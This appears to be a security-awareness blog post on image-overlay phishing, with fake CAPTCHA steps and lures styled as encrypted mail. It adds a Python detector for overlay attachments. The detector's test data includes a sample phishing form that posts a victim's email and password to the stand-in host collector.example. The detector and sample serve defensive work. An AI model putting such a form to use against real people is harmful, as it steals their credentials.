In an image overlay attack, a hacker creates a blurred image of a document that resembles a form you would recognize and overlays it with a login prompt. The image is designed to pique your interest or create a sense of importance or value. The concept of image overlay isn’t new, but today it has a new twist: the login box overlay is intended to steal your email credentials. Let’s look at a few samples.
I’m sure it’s not news to any of you that hackers frequently reuse companies’ logos to try to look credible. Nothing is special about the email in Figure 1. It gets interesting only when you click on the link. Figure 2 shows a very typical image overlay – you feel like you can almost read what’s in it, but the box is in the way. That’s how they get you.
Remember, cybercriminals are always just one step behind us. As we start putting “confidential” in our email to alert our clients, hackers start putting “confidential” in their phishing emails. We use Zix and other tools for email encryption. The hackers are right behind us, making their emails look like encrypted messages.
This next example is no different. At first, once again, you see a reasonably typical email in Figure 3. Figure 4 shows a standard overlay image you’ll see once you open the attachment. Figure 5 shows the new twist – CAPTCHA or antibot protection. I’m sure you’ve seen it before, where a legitimate website will try to determine whether you’re a human or a bot using CAPTCHA or a similar technology. The hacker is doing the same thing. He wants to make sure you’re a human. Thoughtful and reassuring, right? Not so fast. Figure 6 is precisely what you would expect: credential harvesting.
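For mail defenders, the overlay pattern described above can be turned into a simple attachment check. The following is an added example, not part of the original article: it flags HTML that pairs a password field with a document image, CSS blur, or a form posting to a remote host. The class and function names, the heuristics, and both sample documents are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class OverlayScan(HTMLParser):
    """Collects markup features of a login box drawn over a document image."""
    def __init__(self):
        super().__init__()
        self.password_inputs = 0
        self.images = 0
        self.blur_css = False
        self.form_hosts = set()

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        style = a.get("style", "").lower()
        if tag == "input" and a.get("type", "").lower() == "password":
            self.password_inputs += 1
        if tag == "img" or ("background" in style and "url(" in style):
            self.images += 1
        if "blur(" in style:
            self.blur_css = True
        if tag == "form":
            host = urlparse(a.get("action", "")).hostname
            if host:  # absolute URL: the form submits off the local file
                self.form_hosts.add(host)

    def handle_data(self, data):
        if "blur(" in data.lower():  # blur declared in a <style> block
            self.blur_css = True

def overlay_findings(html):
    """Return the reasons an HTML attachment looks like an overlay lure."""
    scan = OverlayScan()
    scan.feed(html)
    if not scan.password_inputs:
        return []  # no credential prompt, nothing to report
    findings = []
    if scan.images:
        findings.append("password field on a page built around an image")
    if scan.blur_css:
        findings.append("CSS blur combined with a password field")
    if scan.form_hosts:
        findings.append("form posts to remote host: " + ", ".join(sorted(scan.form_hosts)))
    return findings

# Constructed samples, not taken from a real message.
SAMPLE_ATTACHMENT = """<html><body style="background:url(invoice.png)">
<div style="filter: blur(4px)"><img src="invoice.png"></div>
<form action="https://collector.example/post" method="post">
<input type="email" name="user"><input type="password" name="pass"></form></body></html>"""
SAMPLE_BENIGN = "<html><body><img src='logo.png'><p>Quarterly report.</p></body></html>"
```

A lure whose blur is baked into the image file itself will only trigger the first and third findings, so treat the output as triage input rather than a verdict.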
Always be ready for something new. Think before you click and be safe.